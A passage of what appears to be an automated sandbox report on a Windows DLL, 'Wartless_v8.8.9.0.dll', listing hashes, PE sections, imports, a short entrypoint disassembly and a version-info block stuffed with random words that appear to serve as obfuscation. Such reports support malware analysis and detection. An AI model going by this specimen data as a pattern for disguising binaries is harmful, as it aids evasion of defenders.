                  Preview:...................................FL..................F.@.. .....@.>...*..#......?.c................................P.O. .:i.....+00.../C:\.....................1.....>Q=w..PROGRA~1..t......L.5T.~....E...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....l.1......L.J..INTERN~1..T......L.5T.~..............................i.n.t.e.r.n.e.t. .e.x.p.l.o.r.e.r.....f.2......L.9 .iexplore.exe..J......L.J5T.~.....R..........x.............i.e.x.p.l.o.r.e...e.x.e.......^...............-.......].............:|.....C:\Program Files\internet explorer\iexplore.exe....-.p.r.i.v.a.t.e...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.I.E.F.R.A.M.E...d.l.l.........%SystemRoot%\SYSTEM32\IEFRAME.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.Y.S.T.E.M.3.2.\.I

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\C600FZWPK8K1ZN4YFJ30.temp

                  Download File
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):3440
                  Entropy (8bit):3.1928448127259985
                  Encrypted:false
                  SSDEEP:48:Hdi0PgI0C9GrIorAsASFrdi0PgI0h683GrIorAczH:tPge9SLAJOPgz3SLAG
                  MD5:2254ED212BC40655A785732E9266C7AB
                  SHA1:FF74B0B5956756CFDB1DE654D2CD5BDD390CED19
                  SHA-256:6657314B16C5227AF1CD6489B14EED18BF319493C2AB55E24F19ACC94B57C58A
                  SHA-512:F6A2287D474B3C4F222E8A262CB5D9221A64F0D720D21EEBEC6FCB31F46BBCA56814673F934362474ECD6FDF944DAD6284B3A2F901438389EBDA678BF5A02957
                  Malicious:false
                  Preview:...................................FL..................F.@.. .....@.>...*..#......?.c................................P.O. .:i.....+00.../C:\.....................1.....>Q=w..PROGRA~1..t......L.5T.~....E...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....l.1......L.J..INTERN~1..T......L.5T.~..............................i.n.t.e.r.n.e.t. .e.x.p.l.o.r.e.r.....f.2......L.9 .iexplore.exe..J......L.J5T.~.....R..........x.............i.e.x.p.l.o.r.e...e.x.e.......^...............-.......].............:|.....C:\Program Files\internet explorer\iexplore.exe....-.p.r.i.v.a.t.e...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.I.E.F.R.A.M.E...d.l.l.........%SystemRoot%\SYSTEM32\IEFRAME.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.Y.S.T.E.M.3.2.\.I

                  Static File Info

                  General

                  File type:MS-DOS executable, MZ for MS-DOS
                  Entropy (8bit):6.163451632114402
                  TrID:
                  • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                  • Generic Win/DOS Executable (2004/3) 0.20%
                  • DOS Executable Generic (2002/1) 0.20%
                  • VXD Driver (31/22) 0.00%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:Wartless_v8.8.9.0.dll
                  File size:442368
                  MD5:3b4e9e88c0dd6e82ecc65e2d219544c6
                  SHA1:5d4f4d60773ed452188c8a099b5972edbbb03f90
                  SHA256:4d4bedbc795e2dd4fe929b6dc57bfc314165795e25c362959fbabc59c0a60d80
                  SHA512:451eb0e4b91a7b37ecf4abe3589e1c0033ae248d0bdec0ecfd8bfec005d010b9400447bcb3707849b40d4f60e3cb5167541d5a779e6b75ca6ab38a37e18968d7
                  SSDEEP:12288:YudQDXhMYGldQDXhMYGldQDXhMYGAGj7:YKyXhPSyXhPSyXhP
                  File Content Preview:MZ......................................................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................!.....6.........." .......P...............................@.......(...............................4..R..

                  File Icon

                  Icon Hash:74f0e4ecccdce0e4

                  Static PE Info

                  General

                  Entrypoint:0x10002022
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x10000000
                  Subsystem:windows gui
                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                  DLL Characteristics:
                  Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:406900a52ebbaff2418df7f831674972

                  Entrypoint Preview

                  Instruction
                  mov ecx, 00001254h
                  push 00000000h
                  call dword ptr [100081A8h]
                  mov ebx, eax
                  push 00000000h
                  push 00000000h
                  call dword ptr [1000850Ch]
                  mov ecx, eax
                  call dword ptr [10008264h]
                  mov ecx, eax
                  mov ebx, eax
                  push 10001083h
                  ret
                  push eax
                  cmp dword ptr [esp+08h], 01h
                  push eax
                  jc 00007FDA44C81136h
                  mov byte ptr [edi+01h], al
                  adc byte ptr [ebx-761B71BCh], cl
                  push ebp
                  cmp ecx, 08h
                  mov dword ptr [10028B1Ch], eax
                  mov esi, dword ptr [ebp+0Ch]
                  pushfd
                  add eax, esi
                  mov eax, ecx
                  sub esp, 00000328h
                  xor eax, eax
                  push eax
                  shr ecx, 02h
                  jbe 00007FDA44C81136h
                  lea eax, dword ptr [edx-02h]
                  call 00007FDA44C86CF6h
                  mov word ptr [ebp+68h], fs
                  add al, cl
                  shr ecx, 02h
                  lea eax, dword ptr [edx-02h]
                  nop
                  call 00007FDA44C82BF4h
                  inc esp
                  jmp 00007FDA44C81135h
                  pop ecx
                  shr ecx, 02h
                  call 00007FDA44C881DDh
                  js 00007FDA44C81136h
                  je 00007FDA44C81136h
                  mov ecx, dword ptr [esp+10h]
                  mov dword ptr [ebp+000002A4h], eax
                  mov eax, dword ptr [eax-04h]
                  push edi
                  push ebp
                  mov ebp, esp
                  add esp, FFFFFFD0h
                  push esi
                  push edi
                  push 10064BB8h
                  call dword ptr [10008410h]
                  mov dword ptr [ebp-08h], eax
                  push dword ptr [00000000h]

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x34ed0x52.text
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x87c00xf0.rdata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x6b0000x7428.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x730000x4f8.reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x7d400xa80.rdata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x10000x342d0x3600False0.612123842593data6.71334607323IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  .rdata0x50000x38b00x3a00False0.380051185345data4.72338733462IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .data0x90000x61f6b0x5c400False0.720091780996data5.98043782395IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                  .rsrc0x6b0000x74280x7600False0.308295815678data3.21705781853IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc0x730000x4f80x600False0.724609375data5.84430272802IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                  Resources

                  NameRVASizeTypeLanguageCountry
                  RT_STRING0x6b0d00x32dataEnglishUnited States
                  RT_VERSION0x6b1040x6f68dataEnglishUnited States
                  RT_VERSION0x7206c0x3bcdataEnglishUnited States

                  Imports

                  DLLImport
                  advapi32.dllRegCreateKeyA, RegOpenKeyA, RegEnumKeyA, RegSetValueExA, RegSetValueA, SetThreadToken, GetFileSecurityA, RegOpenKeyExA, RegCloseKey, RegCreateKeyExA, RegDeleteKeyA, RegQueryValueExA, RevertToSelf, SetFileSecurityA, RegDeleteValueA, RegQueryValueA, OpenThreadToken
                  comdlg32.dllGetFileTitleA
                  crypt32.dllCryptQueryObject, CertGetNameStringA, CertFreeCertificateContext
                  gdi32.dllSetMapMode, CreateDIBPatternBrushPt, AngleArc, GetWorldTransform, CreateEnhMetaFileA, CreateBrushIndirect, ModifyWorldTransform, StrokePath, CreatePatternBrush, LineTo, SetRectRgn, SetColorAdjustment, PlgBlt, SetPixelV, OffsetClipRgn, GetCharacterPlacementA, GetMiterLimit, GdiComment, DPtoLP, GetFontData, GetColorAdjustment, SelectPalette, EnumFontFamiliesExA, CreatePolygonRgn, EnumMetaFile, StretchDIBits, CreateFontA, FlattenPath, GetBkColor, ExtFloodFill, ScaleViewportExtEx, OffsetViewportOrgEx, CreateICA, CreateHalftonePalette, SetTextColor, CreatePen, SetMapperFlags, GetCharWidthA, EnumObjects, PlayMetaFileRecord, GetTextCharacterExtra, SetWindowOrgEx, CreateCompatibleDC, CreateRectRgnIndirect, GetObjectA, CreatePolyPolygonRgn, GetClipRgn, Pie, GetNearestColor, GetPaletteEntries, SetTextCharacterExtra, CreateHatchBrush, CombineRgn, SetAbortProc, Arc, GetCharWidthFloatA, SetBkColor, Rectangle, CloseMetaFile, GetDeviceCaps, EndPage, SetMiterLimit, PolyBezier, GetAspectRatioFilterEx, GetClipBox, SelectClipPath, GetOutlineTextMetricsA, ExcludeClipRect, SelectObject, EndDoc, GetCurrentObject, GetRgnBox, SetWindowExtEx, SetArcDirection, ExtCreatePen, GetNearestPaletteIndex, SetBoundsRect, TextOutA, CreateMetaFileA, GetWindowOrgEx, PtInRegion, FrameRgn, GetPixel, PlayEnhMetaFile, BitBlt, GetTextAlign, MaskBlt, CreateEllipticRgn, GetPolyFillMode, CreateSolidBrush, SetBitmapBits, GetBkMode, GetViewportExtEx, FloodFill, GetBoundsRect, FillPath, GetTextMetricsA, GetROP2, ExtEscape, CreateCompatibleBitmap, EndPath, SetPixel, FillRgn, SetViewportExtEx, SetWorldTransform, GetTextExtentPoint32A, SaveDC, PolyPolyline, ResetDCA, WidenPath, GetMapMode, InvertRgn, PatBlt, PolyBezierTo, LPtoDP, CreateRoundRectRgn, CreateEllipticRgnIndirect, Ellipse, PaintRgn, PathToRegion, UpdateColors, MoveToEx, RectVisible, StartPage, StrokeAndFillPath, GetStockObject, IntersectClipRect, CreateDCA, SetTextAlign, EqualRgn, UnrealizeObject, GetCurrentPositionEx, GetGraphicsMode, RectInRegion, GetPath, CreateFontIndirectA, GetRegionData, ExtSelectClipRgn, StretchBlt, GetCharABCWidthsFloatA, RoundRect, CreatePenIndirect, PtVisible, RealizePalette, SetROP2, DeleteObject, ResizePalette, GetWindowExtEx, SetBitmapDimensionEx, SetBrushOrgEx, GetGlyphOutlineA, OffsetWindowOrgEx, GetBitmapBits, CloseEnhMetaFile, SetGraphicsMode, PolyDraw, RestoreDC, AbortPath, CreateBitmap, CreateRectRgn, SelectClipRgn, GetCharABCWidthsA, CloseFigure, Escape, GetArcDirection, GetStretchBltMode, ArcTo, PolyPolygon, GetDCOrgEx, CreateBitmapIndirect, CreateDiscardableBitmap, ExtCreateRegion, GetTextColor, SetViewportOrgEx, ScaleWindowExtEx, GetObjectType, SetTextJustification, ExtTextOutA, SetStretchBltMode, SetPolyFillMode, StartDocA, AnimatePalette, GetViewportOrgEx, SetBkMode, OffsetRgn, Polygon, GetBitmapDimensionEx, DrawEscape, GetBrushOrgEx, PlayMetaFile, CreatePalette, BeginPath, GetFontLanguageInfo, SetPaletteEntries, Polyline, PolylineTo, Chord, CopyMetaFileA, GetTextFaceA, DeleteDC, AbortDoc
                  kernel32.dlllstrlenA, GetStringTypeW, LCMapStringA, CreateEventA, GlobalReAlloc, ReadFile, LockFile, DuplicateHandle, GetLastError, lstrcmpA, SetStdHandle, HeapAlloc, GetStartupInfoA, VirtualAlloc, LeaveCriticalSection, GetFileTime, SetFileTime, IsBadReadPtr, EnterCriticalSection, MoveFileA, IsValidCodePage, UnlockFile, GetVolumeInformationA, FileTimeToSystemTime, GetEnvironmentStrings, GlobalUnlock, SetFilePointer, GetPrivateProfileStringA, GetStdHandle, GetEnvironmentStringsW, GlobalFree, VirtualProtect, LoadResource, UnmapViewOfFile, MulDiv, OpenFileMappingA, GetStringTypeExA, HeapReAlloc, TlsGetValue, GetConsoleMode, GetFileAttributesA, SetUnhandledExceptionFilter, LoadLibraryW, SystemTimeToFileTime, FreeResource, CompareStringA, GlobalHandle, GetModuleHandleA, VirtualQuery, SizeofResource, SetErrorMode, GetTickCount, LCMapStringW, lstrlenW, WaitForSingleObject, GetThreadPriority, GetModuleHandleW, GetCurrentProcess, CreateThread, FindClose, IsDebuggerPresent, GetCPInfo, MapViewOfFile, HeapDestroy, FreeEnvironmentStringsA, GetConsoleOutputCP, GetConsoleCP, GetThreadLocale, GetVersionExA, CloseHandle, RaiseException, SuspendThread, CopyFileA, GetCurrentThreadId, FindResourceExA, InterlockedDecrement, InterlockedIncrement, GlobalSize, GetStringTypeA, InterlockedExchange, LocalAlloc, GetOEMCP, GlobalGetAtomNameA, LoadLibraryA, FindResourceA, GetAtomNameA, OutputDebugStringA, GlobalAlloc, GlobalDeleteAtom, TlsSetValue, GetACP, WriteConsoleW, WriteConsoleA, LocalFileTimeToFileTime, LockResource, lstrcmpW, FlushFileBuffers, OpenEventA, FindFirstFileA, GlobalAddAtomA, SetEvent, WideCharToMultiByte, FreeLibrary, GetCurrentProcessId, ResumeThread, GetModuleFileNameA, QueryPerformanceCounter, LocalFree, MultiByteToWideChar, GetPrivateProfileIntA, GetHandleInformation, GetProfileIntA, EnumResourceLanguagesA, GetFullPathNameA, GetCurrentThread, OutputDebugStringW, GetFileType, GlobalFindAtomA, HeapCreate, GetProcAddress, GlobalFlags, SetEnvironmentVariableA, GetModuleFileNameW, HeapFree, SetHandleCount, WritePrivateProfileStringA, GetShortPathNameA, GetTempFileNameA, lstrcmpiA, ExitProcess, FormatMessageA, HeapValidate, SetFileAttributesA, LocalReAlloc, GetFileSize, CompareStringW, DeleteCriticalSection, GetLocaleInfoA, TlsAlloc, GetCommandLineA, GetCurrentDirectoryA, WriteFile, GetVersion, CreateFileA, FreeEnvironmentStringsW, GlobalLock, UnhandledExceptionFilter, SetLastError, GetWindowsDirectoryA, GetProcessHeap, FileTimeToLocalFileTime, CreateFileMappingA, RtlUnwind, TlsFree, DebugBreak, GetTimeZoneInformation, TerminateProcess, SetThreadPriority, SetEndOfFile, VirtualFree, ConvertDefaultLocale, DeleteFileA, GetDiskFreeSpaceA, GetSystemInfo, GetDateFormatA, InitializeCriticalSection, VirtualProtectEx, ExitThread
                  ole32.dllStringFromCLSID, ReadClassStg, CreateBindCtx, CLSIDFromString, OleRegGetUserType, OleRun, OleDuplicateData, CoMarshalInterface, CLSIDFromProgID, CoTaskMemFree, CoDisconnectObject, WriteFmtUserTypeStg, CoTreatAsClass, CoReleaseMarshalData, SetConvertStg, CoCreateInstance, CoRevokeClassObject, CoTaskMemAlloc, WriteClassStg, CoRegisterClassObject, ReadFmtUserTypeStg, CoUnmarshalInterface, StringFromGUID2, ReleaseStgMedium, CreateStreamOnHGlobal
                  rpcrt4.dllNdrClientCall2, RpcMgmtIsServerListening, RpcBindingFree, RpcBindingSetAuthInfoA, RpcStringFreeA, RpcStringBindingComposeA, RpcBindingFromStringBindingA
                  shell32.dllExtractIconA, DragFinish, SHGetFileInfoA, DragAcceptFiles, DragQueryFileA
                  shlwapi.dllPathFindExtensionA, PathIsUNCA, PathRemoveExtensionA, SHDeleteKeyA, PathFindFileNameA, PathStripToRootA
                  user32.dllSystemParametersInfoA, GetWindowLongA, GetSystemMetrics, ExcludeUpdateRgn, IsDlgButtonChecked, SetMenuItemInfoA, SetDlgItemInt, CheckMenuItem, MoveWindow, DrawFrameControl, SetWindowLongA, GetAsyncKeyState, OpenIcon, MessageBoxA, IsWindow, WinHelpA, SendDlgItemMessageA, GetScrollInfo, SetScrollPos, GetWindowContextHelpId, InflateRect, GetMenuItemCount, DrawTextA, DestroyIcon, ChildWindowFromPoint, EndDeferWindowPos, DlgDirListA, GetClassNameA, GetMenuContextHelpId, CheckMenuRadioItem, ModifyMenuA, GetMenuState, IsWindowVisible, GetMenuItemInfoA, MsgWaitForMultipleObjects, DeferWindowPos, GetNextDlgGroupItem, SetRectEmpty, CreateCaret, UnregisterClassA, DlgDirListComboBoxA, SetWindowRgn, WindowFromDC, ChangeClipboardChain, ChildWindowFromPointEx, DrawFocusRect, IsWindowEnabled, DeleteMenu, SetMenuDefaultItem, LoadMenuIndirectA, GetForegroundWindow, FindWindowA, OffsetRect, ShowCaret, ReleaseDC, IsMenu, TrackPopupMenuEx, LoadIconA, FindWindowExA, LoadCursorA, GetSubMenu, ScrollWindowEx, UnionRect, CheckDlgButton, DrawCaption, CloseWindow, SetFocus, GetMessageW, GetWindowRgn, DrawMenuBar, ClientToScreen, SubtractRect, OpenClipboard, GetLastActivePopup, BeginDeferWindowPos, DispatchMessageW, GetCaretPos, ScrollDC, GetTopWindow, EndDialog, SetTimer, ArrangeIconicWindows, TranslateAcceleratorA, ScreenToClient, GetDesktopWindow, EqualRect, BringWindowToTop, SetWindowsHookExA, GetWindowRect, ShowScrollBar, SetWindowPlacement, CallNextHookEx, HiliteMenuItem, SetCursor, SetMenuItemBitmaps, FlashWindow, GetClipboardFormatNameA, WindowFromPoint, CreatePopupMenu, TranslateMessage, GetDlgItemTextA, GetClipboardViewer, LoadAcceleratorsA, IsIconic, InvalidateRgn, GetDialogBaseUnits, FillRect, GetClipboardOwner, GetClientRect, GetNextDlgTabItem, SetParent, EndPaint, IsChild, GetDlgCtrlID, RegisterWindowMessageA, GetCursorPos, SetWindowTextA, EnableWindow, SendNotifyMessageA, IsWindowUnicode, GetFocus, GetDCEx, DlgDirSelectComboBoxExA, CheckRadioButton, SetScrollInfo, LockWindowUpdate, UnpackDDElParam, RegisterClassA, SetScrollRange, SetMenuContextHelpId, DispatchMessageA, KillTimer, DragDetect, DestroyMenu, PostQuitMessage, ValidateRect, GetClassLongA, GetUpdateRgn, GetWindowPlacement, CharUpperA, GetMessageA, GetKeyNameTextA, GrayStringA, GetWindowThreadProcessId, ShowOwnedPopups, SendMessageA, IntersectRect, EnableMenuItem, UnhookWindowsHookEx, SetDlgItemTextA, DlgDirSelectExA, DrawStateA, SetCapture, RemovePropA, SetWindowPos, GetScrollRange, GetUpdateRect, GetCapture, SetActiveWindow, ShowWindow, InvertRect, GetActiveWindow, HideCaret, GetClassInfoExA, ValidateRgn, GetWindowTextLengthA, DefWindowProcA, SetPropA, CreateWindowExA, UpdateWindow, PtInRect, DrawTextExA, MapWindowPoints, GetMessageTime, GetPropA, AppendMenuA, GetTabbedTextExtentA, GetWindowTextA, GetParent, EnableScrollBar, BeginPaint, PostMessageA, GetMenuDefaultItem, GetSystemMenu, DrawEdge, SetWindowContextHelpId, SetCaretPos, CopyRect, GetSysColor, GetScrollPos, SetForegroundWindow, GetWindowDC, GetMenuItemID, InvalidateRect, ReuseDDElParam, LoadMenuA, LoadBitmapA, CreateMenu, IsDialogMessageA, RedrawWindow, GetMenuStringA, AdjustWindowRectEx, IsRectEmpty, MapVirtualKeyA, IsZoomed, TrackPopupMenu, ReleaseCapture, SetMenu, SetRect, TabbedTextOutA, PostThreadMessageA, DrawIcon, GetKeyState, SetClipboardViewer, DestroyWindow, GetDlgItemInt, GetDC, CreateDialogIndirectParamA, GetMessagePos, ScrollWindow, GetOpenClipboardWindow, GetMenuCheckMarkDimensions, FrameRect, GetWindow, RemoveMenu
                  winspool.drvOpenPrinterA, DocumentPropertiesA, ClosePrinter

                  Exports

                  NameOrdinalAddress
                  DllRegisterServer10x10003015

                  Version Infos

                  DescriptionData
                  UnmetSicel
                  ThaumoscopicPatagonian
                  MormonweedInaffectation
                  TherewhileUnecclesiastical
                  InternalNameVapidism
                  AcroaesthesiaUnoratorical
                  RhipidistianResmooth
                  PoriferousPausement
                  RheocratTinged
                  TallnessHelminthological
                  PhysiogenicCumaldehyde
                  RegrettablyCawk
                  GibaroUnrulily
                  GearlessHarpwaytuning
                  CovisitNonascription
                  OsieredSymphalangus
                  UncinataCountermission
                  PithoegiaLycus
                  UnflagitiousFelsophyric
                  AcrophobiaVirginship
                  LeptodermousStria
                  DentificationSemimenstrual
                  JumperismDeuteroconid
                  TransumptionClassable
                  ScoptophilicSnowbreak
                  WakerTarsometatarsal
                  SulcationMetrophotography
                  DiscomfortingMicrander
                  DisguisedlyDoko
                  NegusChorist
                  PostamnioticVitrotype
                  SpenerismWhelked
                  HawthornedMaggy
                  UnqualifiableDermorhynchous
                  SecuriferousDeclivitous
                  UnsunnyNortheaster
                  SawmanCognizably
                  CirclerMicrander
                  ApishamoreManweed
                  KelpiePentasepalous
                  ScalewortCarabid
                  KhlystiPragmatica
                  QuadriserialRowlet
                  GallophobiaDrierman
                  PolyphylogenyTheistical
                  EmbolismicSpitpoison
                  WasagaraSuperagency
                  MaggyUnshielding
                  HyracodontidaeInoglia
                  PneumoventriculographyStupidish
                  DownfallenPlatyfish
                  ClimberClitellar
                  ArchgodGymnodinium
                  IngressDithiobenzoic
                  SuperobjectionPreceptively
                  SquamateSeamancraft
                  SmintheusInfraspinate
                  EctypographyMyoxidae
                  SeparatingNoncirculation
                  QuincentenaryDispauperize
                  TermlessClambake
                  PelecypodaSoleness
                  MagnetoprinterOxdiacetic
                  ComplectPlacodont
                  EncephalographyTarand
                  SoliloquizeRockcist
                  KorWaiter
                  DereligionFoveolate
                  InkyRewaybill
                  EleventhlyAntisepticist
                  DebauchmentCoracocostal
                  CovarecasHexamethylene
                  BlisterweedPhylloxeric
                  PeanUnchallengeableness
                  NonacidOvism
                  SuckableBettong
                  PrivateBuildCarbolate
                  UnspewedTransfusionist
                  SpikelikeKaryaster
                  PerisinuitisCombaron
                  ArgestesViburnin
                  GeminationYounger
                  SkellumTriphasic
                  RamusVaccenic
                  DepeoplePsorosis
                  AbolitionizeTonometer
                  MinisterialityKhar
                  SaguerusTwat
                  TiddyTaborin
                  PrestruggleGreeter
                  ConsciencelessBeray
                  ThreskiornithinaeCrabman
                  NegrolikeProtogonous
                  DisbelieverSinuately
                  HelicidaeBedrop
                  NuggetyRecomplaint
                  SilverspotViscounty
                  InterlaceryMelanconiaceae
                  SartoriallyTankless
                  TenentPelecypoda
                  IntertwinementParmeliaceous
                  SemicomplicatedPlugman
                  LabioalveolarCodheaded
                  IndefeatableDiacranteric
                  UnpardonableHammerdress
                  OtodynicZein
                  EsmeraldanStalactitic
                  MezzographAmorality
                  FritillariaAnthropocentrism
                  VirgulariidaeHypermetabolism
                  CapsulationIloko
                  OriginalFilenameWartless
                  BribegiverThiohydrate
                  QuietlyManganic
                  SmokejackAntirevolutionary
                  NeedsomeEpicele
                  SeljukSciarid
                  GorgonianUndiminishably
                  RokerCumulately
                  ChoromaniaDrupaceous
                  KrasisOverlighted
                  TubboeCollingual
                  HackerCephalalgy
                  MissinessMedalet
                  IrrotationalInbreather
                  JumbuckSubcontiguous
                  InnetBrandyball
                  OverholySeismogram
                  TheisticalCatasarka
                  TridynamousSutherlandia
                  AndriasDeutencephalon
                  PreinsinuativeUnbotanical
                  BungOctosporous
                  CheremissianOntogenically
                  OrthodiagraphStutterer
                  DivulgenceLomentariaceous
                  DisoccupyMoraceae
                  ExclusivismUncompanied
                  ScrutatoryShoplet
                  HakeIncohering
                  SendeeProtopathic
                  AortectasiaSandastros
                  HeliolitidaeMisintelligible
                  CellatedHelicotrema
                  SearchablenessFluidization
                  UnfishableFiscalize
                  ReascensionalUnwasteful
                  WellsianFitted
                  EncephalodialysisCounterimagination
                  TyphlopexiaUncompanied
                  SquillidPsilotaceae
                  EyenResazurin
                  AntapologySacramentalist
                  StigmatizerMeliphagidan
                  OrganozincAtavic
                  GyneDorsiparous
                  WalkmillPotamobiidae
                  PhoraAgla
                  UnofficerlikeMazuma
                  InsensatelyRedemptress
                  LazarlikeAnthropomorphology
                  PulpstoneFibrocyst
                  PalamateStalactitic
                  VatteluttuDiatonically
                  SprigtailAlupag
                  AnargyrosSignary
                  DaffTurveydrop
                  DeletoryRullion
                  CanaceeKottigite
                  CatholicityNother
                  ExtrafascicularCaderas
                  ClavelUnbedashed
                  NignayAgonal
                  AwhetDemonstrator
                  BookwardMotivelessness
                  PsychoreflexButoxy
                  UnretrenchedStria
                  PhraseogramSalaryless
                  DullpateColeslaw
                  EnhydraHemoglobinocholia
                  DehydrocorydalineAntisepticist
                  ButenylInstaller
                  UnconfinedRachialgia
                  EverydaynessAngularly
                  StalactiticPrehandle
                  HoarsenessFlauntily
                  PrepersuasionSuckstone
                  ParaphrasticCoprolite
                  SolidisticUnenrichableness
                  StymphalidesCountermotion
                  QuaintlyEquivocatory
                  BerzelianiteRicker
                  ImaginousPlaintiveness
                  VertebrarterialMortalist
                  PorphyreanOscurrantist
                  SourcefulMultiloquous
                  TransplendentlyWizened
                  MyringoplastyUnimpelled
                  SnowkDermography
                  DuctilenessUnbarred
                  DerivedlyNonpassenger
                  HeatheryGriffinhood
                  MeretriciouslyTransverseness
                  EndopathicReshuttle
                  HunchakistTransverseness
                  JabbermentEulamellibranch
                  OmniparientCellated
                  HypoazoturiaSalmwood
                  ShivaiteLovelock
                  SubterraneouslySaccomyian
                  ZootomicalChurchward
                  BradyphemiaAalii
                  DisprisonMartyrologic
                  ScalderSnying
                  RacketerCorrugated
                  FaldstoolShowmanry
                  TsarshipAcetylcarbazole
                  BenzolizeJapanize
                  CaderasSpurwinged
                  TheophagyAntapology
                  WreckyRamellose
                  CoinhabitGrammatite
                  InventivelyOrontium
                  StreetwardHyperscholastic
                  ArpeggiatedWashed
                  OvermastPecked
                  HingeflowerChudic
                  VelocipedeanButenyl
                  TurpantineweedCocreditor
                  UirinaLacerability
                  FormulistBrough
                  MosaicismGyniatry
                  MortalistColauxe
                  SulphoncyanineIloko
                  EquiproportionalitySpirally
                  PachypterousErewhile
                  UnconsecutiveLymphoprotease
                  HarpwaytuningAplacental
                  LowthSpelk
                  WistCasimiroa
                  AbdominousPrisondom
                  ScoliosisPinkeye
                  FirebratPartible
                  NonsensificationCatholicon
                  AxweedTenent
                  BirthmateUncradled
                  RelictionGyniatry
                  CumbererTettigoniid
                  SalarylessPyrroporphyrin
                  StylisticallyScorningly
                  JarringTeleoroentgenography
                  NoctiflorousGastrothecal
                  UnreprovingGypsophily
                  GooglyMyoxidae
                  DorsiductSubgalea
                  AntennulaAcosmistic
                  TailflowerGaspar
                  TwisterInvocator
                  LachrymonasalProtomala
                  StereoelectricSenilely
                  PalaeoceneStaverwort
                  AntidetonantFalsification
                  RecidivationTartronate
                  DiplonemaEnslavedness
                  ScientificopoeticTailage
                  WhapukaLithiastic
                  EutrophicWomanfolk
                  IrrepealableNonconformist
                  PalaeolithoidConcorrezanes
                  OnchocerciasisBerther
                  CorkyPalsification
                  AstrutGyniatry
                  PaleoceanographyWasagara
                  IntrospectivismMomism
                  SociographyJumperism
                  CephalalgyDuumviral
                  CoassistConventionally
                  NonsubsidingDorsobranchiata
                  NonsavingEa
                  HistMacleaya
                  UncomprisedWryly
                  LobedConventionally
                  SuprathoracicBelay
                  IndivertiblyTangently
                  AllonymousBorborygmus
                  CloistererHypermetabolism
                  LegislatorConcorrezanes
                  GorloisFlatulence
                  ThinkingUnpatronized
                  BabyishnessThigmotaxis
                  RookeryGingerness
                  BorningZoophytish
                  GreeklessToxiferous
                  ScotticizeUnstentorian
                  EmesisPunct
                  InfusoriaUnsuccored
                  PterygiophoreProchronic
                  PunctRefreshant
                  CoronalPropendent
                  LaparonephrectomyDiurnation
                  OvismCremasteric
                  LuteinizationSulphohydrate
                  CoincidentlyAstrodiagnosis
                  UnfoolableBalteus
                  CincherJejunitis
                  AntitherminSaccharomycetaceous
                  WaddlingBoomage
                  UnunderstandableSubsultus
                  ChoristateOii
                  HoaryAnnoying
                  TorselMoodishly
                  ThorninessPolyphylogeny
                  PigflowerEruditionist
                  NeoholmiaRuinable
                  NitrostarchHemilethargy
                  SomersetianRashful
                  HyperadenosisPlaintiveness
                  RingbonedLepisosteidae
                  FisticufferyDiphtherotoxin
                  OxytocousDowdyish
                  UncradledScatula
                  TachygrapherEnthraller
                  AaliiRecedent
                  JougDromaeus
                  PalpitationPhysostigmine
                  FautererBoomage
                  LuminantMisniac
                  ChilkatDicephalism
                  UnderdrawersOscurrantist
                  SeropuriformCongressist
                  RhombozoaFlauntily
                  FlannelmouthQuinocarbonium
                  TechnicistCibory
                  CaiquejeeCheremissian
                  ClitchDefoliage
                  SkatosineReascensional
                  ManlinessPaunchful
                  EscaperPyrostat
                  TarboyTetartoid
                  UvulitisNeurocentrum
                  TurgoidFennoman
                  MarssoniaDemonry
                  SurbasedLagarto
                  OverfondlyCerous
                  PsychoneurologicalEntozoology
                  CorylaceaeSolidly
                  UnlustilyLoveflower
